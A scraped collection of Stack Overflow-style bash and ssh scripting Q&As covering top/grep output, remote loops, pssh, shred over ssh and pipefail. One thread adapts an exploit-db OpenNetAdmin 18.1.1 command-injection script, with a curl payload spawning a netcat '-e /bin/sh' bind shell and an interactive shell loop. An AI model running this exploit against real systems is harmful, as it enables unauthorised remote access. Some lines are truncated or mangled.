top and grep output nothing when run from shell script - linux

I am trying to create shell script that ssh into a remote server and run a script there and print the output in the local server but when I run the script in the local server it most of the time outputs nothing and rarely outputs data :
Mule: CPU > % RAM > %
and when I ssh in the local server to the remote server in the command line and run the script it outputs normally in the command line :
Mule: CPU > 39.0% RAM > 8.1%
the script in local server
echo -e '\r'
echo 'leg3'
echo -e '\r'
ssh -qT appread#${remote} << EOF
source /home/appread/
script in remote server :
mulecpu=$(top -b -n 1 -c | grep -P '.*[j]ava.*mule.*'| awk '{print $9}')
muleram=$(top -b -n 1 -c | grep -P '.*[j]ava.*mule.*'| awk '{print $10}')
m=$(echo 'Mule: CPU > '$mulecpu'% RAM > '$muleram'% ')
echo $m

If you run top without -w, its output may be truncated and so your grep may fail.
Add -w 512 or similar to maximise the width of the output:
top -b -n 1 -c -w 512 |\
awk '/[j]ava.*mule/ { printf "Mule: CPU > %s%% RAM > %s%%\n",$9,$10 }'


Using ssh inside a script to run another script that itself calls ssh

I'm trying to write a script that builds a list of nodes then ssh into the first node of that list
and runs a script which it's self is just a for i loop that calls
The first 2 lines seems to work ok, the list builds successfully, but then I get either get just the echo line of to print out or an error saying cat: gpcnodes.txt: No such file or directory
#gets the master node for the job
MASTERNODE=`qstat -t -u \* | grep $1 | awk '{print$8}' | cut -d'#' -f 2 | cut -d'.' -f 1 | sed -e 's/$/.com/' | head -n 1`
#builds list of nodes in job
ssh -qt $MASTERNODE "qstat -t -u \* | grep $1 | awk '{print$8}' | cut -d'#' -f 2 | cut -d'.' -f 1 | sed -e 's/$/.com/' > /users/issues/slow_job_starts/gpcnodes.txt"
ssh -qt $MASTERNODE cd /users/issues/slow_job_starts/
ssh -qt $MASTERNODE /users/issues/slow_job_starts/
for i in `cat gpcnodes.txt `
echo "### $i ###"
ssh -qt $i /users/issues/slow_job_starts/
cd /tmp
time perf record qhost >/dev/null 2>&1 | sed -e 's/^/${str}/'
perf report --pretty=raw | grep % | head -20 | grep -c kernel.kallsyms | sed -e "s/^/`hostname`:/"
When ssh -qt $MASTERNODE cd /users/issues/slow_job_starts/ is finished, the changed directory is lost.
With the backquotes replaced by $(..) (not an error here, but get used to it), the script would be something like
for i in $(cat /users/issues/slow_job_starts/gpcnodes.txt)
echo "### $i ###"
ssh -nqt $i /users/issues/slow_job_starts/
or better
while read -r i; do
echo "### $i ###"
ssh -nqt $i /users/issues/slow_job_starts/
done < /users/issues/slow_job_starts/gpcnodes.txt
Perhaps you would also like to change your last script (start with cd /users/issues/slow_job_starts)
You will find more problems, like sed -e 's/^/${str}/' (the ${str} inside single quotes won't be replaced by a host), but this should get you started.
I added option -n to the ssh call.
Redirects stdin from /dev/null (actually, prevents reading from stdin).
Without this option only one node is checked.

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1
I have to adjust this script so it work for me but I don't get this done.
This is what I have so far:
while true;do
echo -n {"nc -e /bin/sh 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
The output is just:
{nc -e /bin/sh 4444 }
I am a bit struggling with the syntax.
What did I do wrong?
This is what you want, if you just need to launch the nc program. The script supposes that the remote machine is a Linux machine, with /bin/bash and nc (netcat) compiled with the -e support
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
I found a solution that fits:
while true;do
echo -n "{/bin/sh -i}"; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
Just replace the with the target you want to attack and save the script as
Now run the script with ./ and you get an interactive shell on the target system.
To verify that you can now type in pwd or id and check if you was successful.

echo text to multiple files in bash script

I am working on a bash script that uses pssh to run external commands, then join the output of the commands with the IP of each server. pssh has an option -o that writes a file for each server into a specified directory, but if the commands do not run, you just have an empty file. What I am having issues with is updating these empty files with something like "Server Unreachable" so that I know there was a connection issue reaching the server and to not cause problems with the rest of the script.
Here is what I have so far:
now=$(date +"%F")
empty="$(find ./cnxhwinfo-$now/ -maxdepth 1 -type f -name '*' -size 0 -printf '%f%2d')"
command="echo \$(uptime | awk -F'( |,|:)+' '{d=h=m=0; if (\$7==\"min\") m=\$6; else {if (\$7~/^day/) {d=\$6;h=\$8;m=\$9} else {h=\$6;m=\$7}}} {print d+0,\"days\",h+0,\"hours\",m+0,\"minutes\"}'), \$(hostname | awk '{print \$1}'), \$(sudo awk -F '=' 'FNR == 2 {print \$2}' /etc/connex-release/version.txt), \$(lscpu | awk -F: 'BEGIN{ORS=\", \";} NR==4 || NR==6 || NR==15 {print \$2}' | sed 's/ *//g') \$(free -k | awk '/Mem:/{print \$2}'), \$(df -Ph | awk '/var_lib/||/root/ {print \$2,\",\"\$5,\",\"}')"
pssh -h $file -l user -t 10 -i -o /home/user/tools/cnxhwinfo-$now -x -tt $command
echo "Server Unreachable" | tee "./cnxhwinfo-$now/$empty"
ls ./cnxhwinfo-$now >> ./cnx-data-$now
cat ./cnxhwinfo-$now/* >> ./cnx-list-$now
paste -d, ./cnx-data-$now ./cnx-list-$now >>./cnx-data-"$(date +"%F").csv"
I was trying to use find to locate the empty files and write "Server" unavailable using tee with this:
echo "Server Unreachable" | tee "./cnxhwinfo-$now/$empty"
if the folder specified doesn't already exist i get this error:
tee: ./cnxhwinfo-2019-09-03/: Is a directory
And if it does exist (ie, i run the script again), it instead creates a file named after the IP addresses returned by the find command, like this: 1
I've also tried:
echo "Server Unreachable" | tee <(./cnxhwinfo-$now/$empty)
The find command outputs the IP addresses on a single line with a space in between each one, so I thought that would be fine for tee to use, but I feel like I am either running into syntax issues, or am going about this the wrong way. I have another version of this same script that uses regular ssh and works great, just much slower than using pssh.
empty should be an array, assuming none of the file names will contain any whitespace in their names.
readarray -t empty < <(find ...)
echo "Server unreachable" | (cd ./cnxhwinfo-$now/; tee "${empty[#]}" > /dev/null)
Otherwise, you are building a single file name by concatenating the empty file names.

ssh tunneled command output to file

I have an old Syno NAS and wish to use the "shred" command to wipe this disks inside. The idea is to let the command run to complete on the box itself without the need of a computer.
So far I have managed...
1) to get the right parameters for 'shred'
* runs in the background using the &
2) get that command to output the progress (-v option) to a file shred.txt
* to see from the file what the progress is
shred -v -f -z -n 2 /dev/hdd 2>&1 | tee /volume1/backup/shred.txt &
3) ssh tunnel the command so I can turn off my laptop while its running
ssh -n -f root#host "sh -c 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd > /dev/null 2>&1 &'"
The problem is that I can't combine 2) and 3)
I tried to combine them like this, but the resulting file remained empty:
ssh -n -f root#host "sh -c 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd 2>&1 | tee /volume1/backup/shred.txt > /dev/null &'"
It might be a case of the NOOBS but I can't figure out how to get this done.
Any suggestions?
Thanks. Vince
Commands sh and tee are not needed in here:
ssh -n root#host 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd 2>&1 >/volume1/backup/shred.txt &' >/dev/null
The final >/dev/null is optional, it will just disregard any greetings from other hosts.
Tried the following command (based on Grzegorz suggestion) and included the opening date stamp and the before mentioned - stupidly forgotten - verbose switch. Last version of the command string:
ssh -n root#host 'date > /volume1/backup/shred_sda.txt; nohup /opt/bin/shred -v -f -z -n 4 /dev/sda 2>&1 >> /volume1/backup/shred_sda.txt # >/dev/null'
The last thing to figure out is how to include the date stamp when the shred command has completed.

Check for zero lines output from command over SSH

If I do the following, and the network is down, then the zero case will be executed, which it shouldn't.
case "$(ssh -n $host zfs list -t snapshot -o name -H | grep "tank/fs" | wc -l | awk '{print $1}')" in
0) # do something
1) # do something else
*) # fail
Earlier in the script I check that I can SSH to $host, but today I found this problem, where the network failed right after my check.
If I check the return value from the SSH command, then I will always get the return value from awk as it is executed last.
How do I insure that I actually count zero lines that zfs outputted, and not zero lines from a failed SSH connection?
set -o pipefail
at the beginning of your script (or before the case statement).
Moreover, check for the return code of the command before executing the case statement:
set -o pipefail
$value=$(ssh -n $host zfs list -t snapshot -o name -H | grep "tank/fs" | wc -l | awk '{print $1}')
if [ $? == 0 ]; then
case $value in
From the manual:
If set, the return value of a pipeline is the value of the last
(rightmost) command to exit with a non-zero status, or zero if all
commands in the pipeline exit successfully. This option is disabled by
How about this (commands after ssh shouldn't get executed locally):
"$(ssh -n $host 'zfs list -t snapshot -o name -H | grep "tank/fs" | wc -l | awk \'{print $1}\')'"
Note how I single quoted the command for ssh to run on the remote machine. Also escaped the ' for awk like \'. Check the return value of the call and only act when it returns success.
